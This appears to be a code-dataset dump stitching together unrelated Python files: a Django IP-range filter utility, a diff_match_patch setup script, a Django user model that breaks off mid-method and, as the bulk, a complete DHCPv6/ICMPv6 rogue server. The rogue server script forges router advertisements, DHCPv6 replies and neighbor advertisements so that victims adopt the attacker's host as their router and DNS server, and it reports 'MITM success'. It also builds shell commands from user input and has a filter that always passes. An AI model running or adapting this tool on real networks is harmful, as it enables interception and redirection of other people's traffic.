def new_function(*args, **kwargs):
from django.db import connection
cursor = connection.cursor()
cursor.execute(
"SELECT GET_LOCK('{lock_name}', {timeout});".format(
lock_name=lock_name, timeout=timeout
)
)
ret = f(*args, **kwargs)
cursor.execute(
"SELECT RELEASE_LOCK('{lock_name}');".format(
lock_name=lock_name
)
)
return ret
return new_function
return decorator
def fail_mail(content, subject='Inventory is having issues.',
to=people_who_need_to_know_about_failures,
from_=inventorys_email):
"""Send email about a failure."""
msg = MIMEText(content)
msg['Subject'] = subject
msg['From'] = inventorys_email
# msg['To'] = to
s = smtplib.SMTP('localhost')
s.sendmail(from_, to, msg.as_string())
s.quit()
class IPFilterSet(object):
"""The IPFilterSet expects that all IPFilters added to it are of the same
type. This might be useful later.
"""
def __init__(self):
self.ipfs = []
def add(self, ipf):
self.ipfs.append(ipf)
def pprint(self):
for ipf in self.ipfs:
print ipf
def pprint_intersect(self):
for intersect in self.calc_intersect():
print intersect
def calc_intersect(self):
"""
This is where the magic comes from. Given a list of IPFilter objects,
figure the ranges that are common to all the IPFilters, and create a
new list of IPFilter objects that represent this range.
"""
def trim(self, r, rs, ip_type):
if not (rs and r):
return r
r1 = rs[0]
rx = self.intersect(r, r1, ip_type)
return self.trim(rx, rs[1:], ip_type)
def intersect(self, r1, r2, ip_type):
"""Cases:
* Subset or equal
* Left intersect
* Right intersect
* No intersect
"""
if r1.start > r2.end:
return None
# We have intersection somewhere.
if r1.end == r2.end and r1.start == r1.end:
# r1 is subset of r2
# Low High
# r1 |---------|
# r2 |---------|
# rx |---------|
return r1
if r1.start > r2.start and r1.end < r2.end:
# r1 is subset of r2
# Low High
# r1 |-------|
# r2 |---------|
# rx |---------|
return r1
if r1.start > r2.start and r1.end > r2.start:
# Low High
# r1 |---------|
# r2 |---------|
# rx |------|
return IPFilter(None, ip_type, r1.start_upper, r1.start_lower,
r2.end_upper, r2.end_lower)
if r1.start < r2.start and r1.end < r2.end:
# Low High
# r1 |---------|
# r2 |---------|
# rx |------|
return IPFilter(None, ip_type, r2.start_upper, r2.start_lower,
r1.end_upper, r1.end_lower)
class IPFilter(object):
def __init__(self, start, end, ip_type, object_=None):
self.object_ = object_ # The composite object (it can be None)
self.ip_type = ip_type
self.start, self.end, self.Q = start_end_filter(start, end, ip_type)
def __str__(self):
return "{0} -- {1}".format(self.start, self.end)
def __repr__(self):
return str(self)
def start_end_filter(start, end, ip_type):
ip_type = ip_type
if ip_type == '6':
IPKlass = ipaddr.IPv6Address
elif ip_type == '4':
IPKlass = ipaddr.IPv4Address
istart = IPKlass(start)
iend = IPKlass(end)
if int(istart) == int(iend):
raise ValidationError("start and end cannot be equal")
elif int(istart) > int(iend):
raise ValidationError("start cannot be greater than end")
start_upper, start_lower = one_to_two(int(istart))
end_upper, end_lower = one_to_two(int(iend))
# Equal uppers. Lower must be within.
if start_upper == end_upper:
q = Q(ip_upper=start_upper,
ip_lower__gte=start_lower,
ip_lower__lte=end_lower,
ip_type=ip_type)
else:
q = Q(ip_upper__gt=start_upper, ip_upper__lt=end_upper,
ip_type=ip_type)
return istart, iend, q
def networks_to_Q(networks):
"""Take a list of network objects and compile a Q that matches any object
that exists in one of those networks."""
q = Q()
for network in networks:
network.update_ipf()
q = q | network.ipf.Q
return q
def two_to_four(start, end):
start_upper = start >> 64
start_lower = start & (1 << 64) - 1
end_upper = end >> 64
end_lower = end & (1 << 64) - 1
return start_upper, start_lower, end_upper, end_lower
def one_to_two(ip):
return (ip >> 64, ip & (1 << 64) - 1)
def two_to_one(upper, lower):
return long(upper << 64) + long(lower)
def four_to_two(start_upper, start_lower, end_upper, end_lower):
start = (start_upper << 64) + start_lower
end = (end_upper << 64) + end_lower
return start, end
def int_to_ip(ip, ip_type):
"""A wrapper that converts a 32 or 128 bit integer into human readable IP
format."""
if ip_type == '6':
IPKlass = ipaddr.IPv6Address
elif ip_type == '4':
IPKlass = ipaddr.IPv4Address
return str(IPKlass(ip))
def resolve_ip_type(ip_str):
if ip_str.find(':') > -1:
Klass = ipaddr.IPv6Network
ip_type = '6'
elif ip_str.find('.') > -1:
Klass = ipaddr.IPv4Network
ip_type = '4'
else:
Klass = None
ip_type = None
return ip_type, Klass
def to_a(text, obj):
return "<a href='{0}'>{1}</a>".format(obj.absolute_url(), text)
|
bsd-3-clause
| 522,087,460,123,051,500 | 28.776256 | 78 | 0.535501 | false | 3.534417 | false | false | false |
Vladimir-Ivanov-Git/raw-packet
|
Scripts/DHCP/dhcpv6_rogue_server.py
|
1
|
36326
|
#!/usr/bin/env python
# region Import
from sys import path
from os.path import dirname, abspath
project_root_path = dirname(dirname(dirname(abspath(__file__))))
utils_path = project_root_path + "/Utils/"
path.append(utils_path)
from base import Base
from network import Ethernet_raw, IPv6_raw, ICMPv6_raw, UDP_raw, DHCPv6_raw
from tm import ThreadManager
from sys import exit
from argparse import ArgumentParser
from socket import socket, AF_PACKET, SOCK_RAW, htons
from random import randint
from time import sleep
from os import errno
import subprocess as sub
# endregion
# region Check user, platform and create threads
Base = Base()
Base.check_user()
Base.check_platform()
tm = ThreadManager(5)
# endregion
# region Parse script arguments
parser = ArgumentParser(description='DHCPv6 Rogue server')
parser.add_argument('-i', '--interface', help='Set interface name for send reply packets')
parser.add_argument('-p', '--prefix', type=str, help='Set network prefix', default='fd00::/64')
parser.add_argument('-f', '--first_suffix', type=int, help='Set first suffix client IPv6 for offering', default=2)
parser.add_argument('-l', '--last_suffix', type=int, help='Set last suffix client IPv6 for offering', default=255)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
parser.add_argument('-T', '--target_ipv6', type=str, help='Set client Global IPv6 address with MAC in --target_mac',
default=None)
parser.add_argument('-D', '--disable_dhcpv6', action='store_true', help='Do not use DHCPv6 protocol')
parser.add_argument('-d', '--dns', type=str, help='Set recursive DNS IPv6 address', default=None)
parser.add_argument('-s', '--dns_search', type=str, help='Set DNS search list', default="local")
parser.add_argument('--delay', type=int, help='Set delay between packets', default=1)
parser.add_argument('-q', '--quiet', action='store_true', help='Minimal output')
args = parser.parse_args()
# endregion
# region Print banner if argument quit is not set
if not args.quiet:
Base.print_banner()
# endregion
# region Set global variables
eth = Ethernet_raw()
ipv6 = IPv6_raw()
icmpv6 = ICMPv6_raw()
udp = UDP_raw()
dhcpv6 = DHCPv6_raw()
recursive_dns_address = None
target_mac_address = None
target_ipv6_address = None
first_suffix = None
last_suffix = None
clients = {}
icmpv6_router_solicitation_address = "33:33:00:00:00:02"
dhcpv6_requests_address = "33:33:00:01:00:02"
# endregion
# region Disable or Enable DHCPv6 protocol
disable_dhcpv6 = False
if args.disable_dhcpv6:
disable_dhcpv6 = True
# endregion
# region Get your network settings
if args.interface is None:
Base.print_warning("Please set a network interface for sniffing ICMPv6 and DHCPv6 requests ...")
current_network_interface = Base.netiface_selection(args.interface)
your_mac_address = Base.get_netiface_mac_address(current_network_interface)
if your_mac_address is None:
print Base.c_error + "Network interface: " + current_network_interface + " do not have MAC address!"
exit(1)
your_local_ipv6_address = Base.get_netiface_ipv6_link_address(current_network_interface)
if your_local_ipv6_address is None:
print Base.c_error + "Network interface: " + current_network_interface + " do not have IPv6 link local address!"
exit(1)
# endregion
# region Create raw socket
global_socket = socket(AF_PACKET, SOCK_RAW)
global_socket.bind((current_network_interface, 0))
# endregion
# region Set search domain and Network prefix
dns_search = args.dns_search
network_prefix = args.prefix
network_prefix_address = network_prefix.split('/')[0]
network_prefix_length = network_prefix.split('/')[1]
# endregion
# region Set target MAC and IPv6 address, if target IP is not set - get first and last suffix IPv6 address
# region Set target IPv6 address
if args.target_mac is not None:
target_mac_address = str(args.target_mac).lower()
# endregion
# region Target IPv6 is set
if args.target_ipv6 is not None:
if args.target_mac is not None:
if not Base.ipv6_address_validation(args.target_ipv6):
Base.print_error("Bad target IPv6 address in `-T, --target_ipv6` parameter: ", args.target_ipv6)
exit(1)
else:
target_ipv6_address = args.target_ipv6
clients[target_mac_address] = {'advertise address': target_ipv6_address}
else:
Base.print_error("Please set target MAC address (example: --target_mac 00:AA:BB:CC:DD:FF)" +
", for target IPv6 address: ", args.target_ipv6)
exit(1)
# endregion
# region Target IPv6 is not set - get first and last suffix IPv6 address
else:
# Check first suffix IPv6 address
if 1 < args.first_suffix < 65535:
first_suffix = args.first_suffix
else:
Base.print_error("Bad value `-f, --first_suffix`: ", args.first_suffix,
"; first suffix IPv6 address must be in range: ", "1 - 65535")
exit(1)
# Check last suffix IPv6 address
if args.last_suffix > first_suffix:
if 1 < args.last_suffix < 65535:
last_suffix = args.last_suffix
else:
Base.print_error("Bad value `-l, --last_suffix`: ", args.first_suffix,
"; last suffix IPv6 address must be in range: ", "1 - 65535")
exit(1)
else:
Base.print_error("Bad value `-l, --last_suffix`: ", args.first_suffix,
"; last suffix IPv6 address should be more first suffix IPv6 address: ", str(first_suffix))
exit(1)
# endregion
# endregion
# region Set recursive DNS server address
if args.dns is None:
recursive_dns_address = your_local_ipv6_address
else:
if Base.ipv6_address_validation(args.dns):
recursive_dns_address = args.dns
else:
Base.print_error("Bad DNS server IPv6 address in `--dns` parameter: ", args.dns)
exit(1)
# endregion
# region General output
if not args.quiet:
Base.print_info("Network interface: ", current_network_interface)
Base.print_info("Your MAC address: ", your_mac_address)
Base.print_info("Your link local IPv6 address: ", your_local_ipv6_address)
if target_mac_address is not None:
Base.print_info("Target MAC: ", target_mac_address)
if target_ipv6_address is not None:
Base.print_info("Target Global IPv6: ", target_ipv6_address)
else:
Base.print_info("First suffix offer IP: ", str(first_suffix))
Base.print_info("Last suffix offer IP: ", str(last_suffix))
Base.print_info("Prefix: ", network_prefix)
Base.print_info("Router IPv6 address: ", your_local_ipv6_address)
Base.print_info("DNS IPv6 address: ", recursive_dns_address)
Base.print_info("Domain search: ", dns_search)
# endregion
# region Add client info in global clients dictionary
def add_client_info_in_dictionary(client_mac_address, client_info, this_client_already_in_dictionary=False):
if this_client_already_in_dictionary:
clients[client_mac_address].update(client_info)
else:
clients[client_mac_address] = client_info
# endregion
# region Send ICMPv6 solicit packets
def send_icmpv6_solicit_packets():
icmpv6_solicit_raw_socket = socket(AF_PACKET, SOCK_RAW)
icmpv6_solicit_raw_socket.bind((current_network_interface, 0))
try:
while True:
icmpv6_solicit_packet = icmpv6.make_router_solicit_packet(ethernet_src_mac=your_mac_address,
ipv6_src=your_local_ipv6_address,
need_source_link_layer_address=True,
source_link_layer_address=eth.get_random_mac())
icmpv6_solicit_raw_socket.send(icmpv6_solicit_packet)
sleep(int(args.delay))
except KeyboardInterrupt:
Base.print_info("Exit")
icmpv6_solicit_raw_socket.close()
exit(0)
# endregion
# region Send DHCPv6 solicit packets
def send_dhcpv6_solicit_packets():
dhcpv6_solicit_raw_socket = socket(AF_PACKET, SOCK_RAW)
dhcpv6_solicit_raw_socket.bind((current_network_interface, 0))
try:
while True:
Client_DUID = dhcpv6.get_duid(eth.get_random_mac())
request_options = [23, 24]
dhcpv6_solicit_packet = dhcpv6.make_solicit_packet(ethernet_src_mac=your_mac_address,
ipv6_src=your_local_ipv6_address,
transaction_id=randint(1, 16777215),
client_identifier=Client_DUID,
option_request_list=request_options)
dhcpv6_solicit_raw_socket.send(dhcpv6_solicit_packet)
sleep(int(args.delay))
except KeyboardInterrupt:
Base.print_info("Exit")
dhcpv6_solicit_raw_socket.close()
exit(0)
# endregion
# region Send ICMPv6 advertise packets
def send_icmpv6_advertise_packets():
icmpv6_advertise_raw_socket = socket(AF_PACKET, SOCK_RAW)
icmpv6_advertise_raw_socket.bind((current_network_interface, 0))
icmpv6_ra_packet = icmpv6.make_router_advertisement_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac="33:33:00:00:00:01",
ipv6_src=your_local_ipv6_address,
ipv6_dst="ff02::1",
dns_address=recursive_dns_address,
domain_search=dns_search,
prefix=network_prefix,
router_lifetime=5000,
advertisement_interval=int(args.delay) * 1000)
try:
while True:
icmpv6_advertise_raw_socket.send(icmpv6_ra_packet)
sleep(int(args.delay))
except KeyboardInterrupt:
Base.print_info("Exit")
icmpv6_advertise_raw_socket.close()
exit(0)
# endregion
# region Reply to DHCPv6 and ICMPv6 requests
def reply(request):
# region Define global variables
global global_socket
global disable_dhcpv6
global clients
global target_ipv6_address
global first_suffix
global last_suffix
# endregion
# region Get client MAC address
client_mac_address = request['Ethernet']['source']
# endregion
# region Check this client already in global clients dictionary
client_already_in_dictionary = False
if client_mac_address in clients.keys():
client_already_in_dictionary = True
# endregion
# region ICMPv6
if 'ICMPv6' in request.keys():
# region ICMPv6 Router Solicitation
if request['ICMPv6']['type'] == 133:
# Make and send ICMPv6 router advertisement packet
icmpv6_ra_packet = icmpv6.make_router_advertisement_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=request['Ethernet']['source'],
ipv6_src=your_local_ipv6_address,
ipv6_dst=request['IPv6']['source-ip'],
dns_address=recursive_dns_address,
domain_search=dns_search,
prefix=network_prefix,
router_lifetime=5000)
global_socket.send(icmpv6_ra_packet)
# Print info messages
Base.print_info("ICMPv6 Router Solicitation request from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")")
Base.print_info("ICMPv6 Router Advertisement reply to: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")")
# Delete this client from global clients dictionary
try:
del clients[client_mac_address]
client_already_in_dictionary = False
except KeyError:
pass
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"router solicitation": True,
"network prefix": network_prefix},
client_already_in_dictionary)
# endregion
# region ICMPv6 Neighbor Solicitation
if request['ICMPv6']['type'] == 135:
# region Get ICMPv6 Neighbor Solicitation target address
target_address = request['ICMPv6']['target-address']
# endregion
# region Network prefix in ICMPv6 Neighbor Solicitation target address is bad
if not target_address.startswith('fe80::'):
if not target_address.startswith(network_prefix_address):
na_packet = icmpv6.make_neighbor_advertisement_packet(ethernet_src_mac=your_mac_address,
ipv6_src=your_local_ipv6_address,
target_ipv6_address=target_address)
for _ in range(5):
global_socket.send(na_packet)
# endregion
# region ICMPv6 Neighbor Solicitation target address is your local IPv6 address
if target_address == your_local_ipv6_address:
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"neighbor solicitation your address": True},
client_already_in_dictionary)
# endregion
# region DHCPv6 advertise address is set
# This client already in dictionary
if client_already_in_dictionary:
# Advertise address for this client is set
if 'advertise address' in clients[client_mac_address].keys():
# ICMPv6 Neighbor Solicitation target address is DHCPv6 advertise IPv6 address
if target_address == clients[client_mac_address]['advertise address']:
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"neighbor solicitation advertise address": True},
client_already_in_dictionary)
# ICMPv6 Neighbor Solicitation target address is not DHCPv6 advertise IPv6 address
else:
if not target_address.startswith('fe80::'):
na_packet = icmpv6.make_neighbor_advertisement_packet(ethernet_src_mac=your_mac_address,
ipv6_src=your_local_ipv6_address,
target_ipv6_address=target_address)
for _ in range(5):
global_socket.send(na_packet)
# endregion
# region Print MITM Success message
if not disable_dhcpv6:
try:
if clients[client_mac_address]['dhcpv6 mitm'] == 'success':
test = clients[client_mac_address]['neighbor solicitation your address']
try:
test = clients[client_mac_address]['success message']
except KeyError:
Base.print_success("MITM success: ",
clients[client_mac_address]['advertise address'] +
" (" + client_mac_address + ")")
clients[client_mac_address].update({"success message": True})
except KeyError:
pass
# endregion
# endregion
# endregion
# region DHCPv6
# Protocol DHCPv6 is enabled
if not disable_dhcpv6:
if 'DHCPv6' in request.keys():
# region DHCPv6 Solicit
if request['DHCPv6']['message-type'] == 1:
# Get Client DUID time from Client Identifier DUID
client_duid_time = 0
for dhcpv6_option in request['DHCPv6']['options']:
if dhcpv6_option['type'] == 1:
client_duid_time = dhcpv6_option['value']['duid-time']
# Set IPv6 address in advertise packet
if target_ipv6_address is not None:
ipv6_address = target_ipv6_address
else:
ipv6_address = network_prefix.split('/')[0] + str(randint(first_suffix, last_suffix))
# Make and send DHCPv6 advertise packet
dhcpv6_advertise = dhcpv6.make_advertise_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=request['Ethernet']['source'],
ipv6_src=your_local_ipv6_address,
ipv6_dst=request['IPv6']['source-ip'],
transaction_id=request['DHCPv6']['transaction-id'],
dns_address=recursive_dns_address,
domain_search=dns_search,
ipv6_address=ipv6_address,
client_duid_timeval=client_duid_time)
global_socket.send(dhcpv6_advertise)
# Print info messages
Base.print_info("DHCPv6 Solicit from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']))
Base.print_info("DHCPv6 Advertise to: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" IAA: ", ipv6_address)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 solicit": True,
"advertise address": ipv6_address},
client_already_in_dictionary)
# endregion
# region DHCPv6 Request
if request['DHCPv6']['message-type'] == 3:
# Set DHCPv6 reply packet
dhcpv6_reply = None
# region Get Client DUID time, IPv6 address and Server MAC address
client_duid_time = 0
client_ipv6_address = None
server_mac_address = None
for dhcpv6_option in request['DHCPv6']['options']:
if dhcpv6_option['type'] == 1:
client_duid_time = dhcpv6_option['value']['duid-time']
if dhcpv6_option['type'] == 2:
server_mac_address = dhcpv6_option['value']['mac-address']
if dhcpv6_option['type'] == 3:
client_ipv6_address = dhcpv6_option['value']['ipv6-address']
# endregion
if server_mac_address and client_ipv6_address is not None:
# Check Server MAC address
if server_mac_address != your_mac_address:
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 mitm":
"error: server mac address is not your mac address"},
client_already_in_dictionary)
else:
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 mitm": "success"},
client_already_in_dictionary)
try:
if client_ipv6_address == clients[client_mac_address]['advertise address']:
dhcpv6_reply = dhcpv6.make_reply_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=request['Ethernet']['source'],
ipv6_src=your_local_ipv6_address,
ipv6_dst=request['IPv6']['source-ip'],
transaction_id=request['DHCPv6']
['transaction-id'],
dns_address=recursive_dns_address,
domain_search=dns_search,
ipv6_address=client_ipv6_address,
client_duid_timeval=client_duid_time)
global_socket.send(dhcpv6_reply)
else:
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 mitm":
"error: client request address is not advertise address"},
client_already_in_dictionary)
except KeyError:
add_client_info_in_dictionary(client_mac_address,
{"dhcpv6 mitm":
"error: not found dhcpv6 solicit request for this client"},
client_already_in_dictionary)
# Print info messages
Base.print_info("DHCPv6 Request from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" Server: ", server_mac_address,
" IAA: ", client_ipv6_address)
if dhcpv6_reply is not None:
Base.print_info("DHCPv6 Reply to: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" Server: ", server_mac_address,
" IAA: ", client_ipv6_address)
else:
if clients[client_mac_address]["dhcpv6 mitm"] == \
"error: server mac address is not your mac address":
Base.print_error("Server MAC address in DHCPv6 Request is not your MAC address " +
"for this client: ", client_mac_address)
if clients[client_mac_address]["dhcpv6 mitm"] == \
"error: client request address is not advertise address":
Base.print_error("Client requested IPv6 address is not advertise IPv6 address " +
"for this client: ", client_mac_address)
if clients[client_mac_address]["dhcpv6 mitm"] == \
"error: not found dhcpv6 solicit request for this client":
Base.print_error("Could not found DHCPv6 solicit request " +
"for this client: ", client_mac_address)
# endregion
# region DHCPv6 Release
if request['DHCPv6']['message-type'] == 8:
# Print info message
Base.print_info("DHCPv6 Release from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']))
# Delete this client from global clients dictionary
try:
del clients[client_mac_address]
client_already_in_dictionary = False
except KeyError:
pass
# endregion
# region DHCPv6 Confirm
if request['DHCPv6']['message-type'] == 4:
# region Get Client DUID time and client IPv6 address
client_duid_time = 0
client_ipv6_address = None
for dhcpv6_option in request['DHCPv6']['options']:
if dhcpv6_option['type'] == 1:
client_duid_time = dhcpv6_option['value']['duid-time']
if dhcpv6_option['type'] == 3:
client_ipv6_address = dhcpv6_option['value']['ipv6-address']
# endregion
# region Make and send DHCPv6 Reply packet
dhcpv6_reply = dhcpv6.make_reply_packet(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=request['Ethernet']['source'],
ipv6_src=your_local_ipv6_address,
ipv6_dst=request['IPv6']['source-ip'],
transaction_id=request['DHCPv6']['transaction-id'],
dns_address=recursive_dns_address,
domain_search=dns_search,
ipv6_address=client_ipv6_address,
client_duid_timeval=client_duid_time)
global_socket.send(dhcpv6_reply)
# endregion
# region Add Client info in global clients dictionary and print info message
add_client_info_in_dictionary(client_mac_address,
{"advertise address": client_ipv6_address,
"dhcpv6 mitm": "success"},
client_already_in_dictionary)
Base.print_info("DHCPv6 Confirm from: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" IAA: ", client_ipv6_address)
Base.print_info("DHCPv6 Reply to: ", request['IPv6']['source-ip'] +
" (" + request['Ethernet']['source'] + ")",
" XID: ", hex(request['DHCPv6']['transaction-id']),
" IAA: ", client_ipv6_address)
# endregion
# endregion
# # DHCPv6 Decline
# if request.haslayer(DHCP6_Decline):
# print Base.c_warning + "Sniff DHCPv6 Decline from: " + request[IPv6].src + " (" + \
# request[Ether].src + ") TID: " + hex(request[DHCP6_Decline].trid) + \
# " IAADDR: " + request[DHCP6OptIAAddress].addr
# # print request.summary
# endregion
# endregion
# region Main function
if __name__ == "__main__":
# region Send ICMPv6 advertise packets in other thread
tm.add_task(send_icmpv6_advertise_packets)
# endregion
# region Add multicast MAC addresses on interface
try:
Base.print_info("Get milticast MAC address on interface: ", current_network_interface)
mcast_addresses = sub.Popen(['ip maddress show ' + current_network_interface], shell=True, stdout=sub.PIPE)
out, err = mcast_addresses.communicate()
if icmpv6_router_solicitation_address not in out:
icmpv6_mcast_address = sub.Popen(['ip maddress add ' + icmpv6_router_solicitation_address +
' dev ' + current_network_interface], shell=True, stdout=sub.PIPE)
out, err = icmpv6_mcast_address.communicate()
if out == "":
Base.print_info("Add milticast MAC address: ", icmpv6_router_solicitation_address,
" on interface: ", current_network_interface)
else:
Base.print_error("Could not add milticast MAC address: ", icmpv6_router_solicitation_address,
" on interface: ", current_network_interface)
exit(1)
if dhcpv6_requests_address not in out:
dhcp6_mcast_address = sub.Popen(['ip maddress add ' + dhcpv6_requests_address +
' dev ' + current_network_interface], shell=True, stdout=sub.PIPE)
out, err = dhcp6_mcast_address.communicate()
if out == "":
Base.print_info("Add milticast MAC address: ", dhcpv6_requests_address,
" on interface: ", current_network_interface)
else:
Base.print_error("Could not add milticast MAC address: ", dhcpv6_requests_address,
" on interface: ", current_network_interface)
exit(1)
except OSError as e:
if e.errno == errno.ENOENT:
Base.print_error("Program: ", "ip", " is not installed!")
exit(1)
else:
Base.print_error("Something went wrong while trying to run ", "`ip`")
exit(2)
# endregion
# region Create RAW socket for sniffing
raw_socket = socket(AF_PACKET, SOCK_RAW, htons(0x0003))
# endregion
# region Print info message
Base.print_info("Waiting for a ICMPv6 or DHCPv6 requests ...")
# endregion
# region Start sniffing
while True:
# region Try
try:
# region Sniff packets from RAW socket
packets = raw_socket.recvfrom(2048)
for packet in packets:
# region Parse Ethernet header
ethernet_header = packet[:eth.header_length]
ethernet_header_dict = eth.parse_header(ethernet_header)
# endregion
# region Could not parse Ethernet header - break
if ethernet_header_dict is None:
break
# endregion
# region Ethernet filter
if target_mac_address is not None:
if ethernet_header_dict['source'] != target_mac_address:
break
else:
if ethernet_header_dict['source'] == your_mac_address:
break
# endregion
# region IPv6 packet
# 34525 - Type of IP packet (0x86dd)
if ethernet_header_dict['type'] != ipv6.header_type:
break
# region Parse IPv6 header
ipv6_header = packet[eth.header_length:eth.header_length + ipv6.header_length]
ipv6_header_dict = ipv6.parse_header(ipv6_header)
# endregion
# region Could not parse IPv6 header - break
if ipv6_header_dict is None:
break
# endregion
# region UDP
if ipv6_header_dict['next-header'] == udp.header_type:
# region Parse UDP header
udp_header_offset = eth.header_length + ipv6.header_length
udp_header = packet[udp_header_offset:udp_header_offset + udp.header_length]
udp_header_dict = udp.parse_header(udp_header)
# endregion
# region Could not parse UDP header - break
if udp_header_dict is None:
break
# endregion
# region DHCPv6 packet
if udp_header_dict['destination-port'] == 547 and udp_header_dict['source-port'] == 546:
# region Parse DHCPv6 request packet
dhcpv6_packet_offset = udp_header_offset + udp.header_length
dhcpv6_packet = packet[dhcpv6_packet_offset:]
dhcpv6_packet_dict = dhcpv6.parse_packet(dhcpv6_packet)
# endregion
# region Could not parse DHCPv6 request packet - break
if dhcpv6_packet_dict is None:
break
# endregion
# region Call function with full DHCPv6 packet
reply({
"Ethernet": ethernet_header_dict,
"IPv6": ipv6_header_dict,
"UDP": udp_header_dict,
"DHCPv6": dhcpv6_packet_dict
})
# endregion
# endregion
# endregion
# region ICMPv6
if ipv6_header_dict['next-header'] == icmpv6.packet_type:
# region Parse ICMPv6 packet
icmpv6_packet_offset = eth.header_length + ipv6.header_length
icmpv6_packet = packet[icmpv6_packet_offset:]
icmpv6_packet_dict = icmpv6.parse_packet(icmpv6_packet)
# endregion
# region Could not parse ICMPv6 packet - break
if icmpv6_packet_dict is None:
break
# endregion
# region ICMPv6 filter
if icmpv6_packet_dict['type'] == 133 or 135:
pass
else:
break
# endregion
# region Call function with full ICMPv6 packet
reply({
"Ethernet": ethernet_header_dict,
"IPv6": ipv6_header_dict,
"ICMPv6": icmpv6_packet_dict
})
# endregion
# endregion
# endregion
# endregion
# endregion
# region Exception - KeyboardInterrupt
except KeyboardInterrupt:
Base.print_info("Exit")
exit(0)
# endregion
# endregion
# endregion
|
unlicense
| 7,659,077,770,600,407,000 | 43.846914 | 121 | 0.500248 | false | 4.588354 | false | false | false |
JoshData/diff_match_patch-python
|
setup.py
|
2
|
1307
|
from setuptools import setup, find_packages, Extension
# Note to self: To upload a new version to PyPI, run:
# pip install wheel twine
# python setup.py sdist bdist_wheel
# twine upload dist/*
module1 = Extension('diff_match_patch',
sources = ['interface.cpp'],
include_dirs = [],
libraries = [])
setup(
name='diff_match_patch_python',
version='1.0.2',
description=u'A Python extension module that wraps Google\'s diff_match_patch C++ implementation for very fast string comparisons. Version 1.0.2 fixes a build issue on Macs.',
long_description=open("README.rst").read(),
author=u'Joshua Tauberer',
author_email=u'[email protected]',
url='https://github.com/JoshData/diff_match_patch-python',
packages=find_packages(),
license='CC0 (copyright waived)',
keywords="diff compare Google match patch diff_match_patch extension native C fast",
ext_modules=[module1],
classifiers=[
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
test_suite='tests',
)
|
cc0-1.0
| -4,188,308,818,056,781,300 | 37.441176 | 179 | 0.636572 | false | 3.972644 | false | false | false |
SeaItRise/SeaItRise-webportal
|
src/accounts/models.py
|
1
|
4568
|
import uuid
from datetime import timedelta
from django.conf import settings
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager
from django.db import models
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
class MyUserManager(BaseUserManager):
def _create_user(self, email, password, first_name, last_name, is_staff, is_superuser, **extra_fields):
"""
Create and save an User with the given email, password, name and phone number.
:param email: string
:param password: string
:param first_name: string
:param last_name: string
:param is_staff: boolean
:param is_superuser: boolean
:param extra_fields:
:return: User
"""
now = timezone.now()
email = self.normalize_email(email)
user = self.model(email=email,
first_name=first_name,
last_name=last_name,
is_staff=is_staff,
is_active=True,
is_superuser=is_superuser,
last_login=now,
date_joined=now, **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_user(self, email, first_name, last_name, password, **extra_fields):
"""
Create and save an User with the given email, password and name.
:param email: string
:param first_name: string
:param last_name: string
:param password: string
:param extra_fields:
:return: User
"""
return self._create_user(email, password, first_name, last_name, is_staff=False, is_superuser=False,
**extra_fields)
def create_superuser(self, email, first_name='', last_name='', password=None, **extra_fields):
"""
Create a super user.
:param email: string
:param first_name: string
:param last_name: string
:param password: string
:param extra_fields:
:return: User
"""
return self._create_user(email, password, first_name, last_name, is_staff=True, is_superuser=True,
**extra_fields)
class User(AbstractBaseUser):
"""
Model that represents an user.
To be active, the user must register and confirm his email.
"""
GENDER_MALE = 'M'
GENDER_FEMALE = 'F'
GENDER_CHOICES = (
(GENDER_MALE, 'Male'),
(GENDER_FEMALE, 'Female')
)
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
first_name = models.CharField(_('First Name'), max_length=50)
last_name = models.CharField(_('Last Name'), max_length=50)
email = models.EmailField(_('Email address'), unique=True)
gender = models.CharField(max_length=1, choices=GENDER_CHOICES, default=GENDER_MALE)
confirmed_email = models.BooleanField(default=False)
is_staff = models.BooleanField(_('staff status'), default=False)
is_superuser = models.BooleanField(_('superuser status'), default=False)
is_active = models.BooleanField(_('active'), default=True)
date_joined = models.DateTimeField(_('date joined'), auto_now_add=True)
date_updated = models.DateTimeField(_('date updated'), auto_now=True)
activation_key = models.UUIDField(unique=True, default=uuid.uuid4) # email
USERNAME_FIELD = 'email'
objects = MyUserManager()
def __str__(self):
"""
Unicode representation for an user model.
:return: string
"""
return self.email
def get_full_name(self):
"""
Return the first_name plus the last_name, with a space in between.
:return: string
"""
return "{0} {1}".format(self.first_name, self.last_name)
def get_short_name(self):
"""
Return the first_name.
:return: string
"""
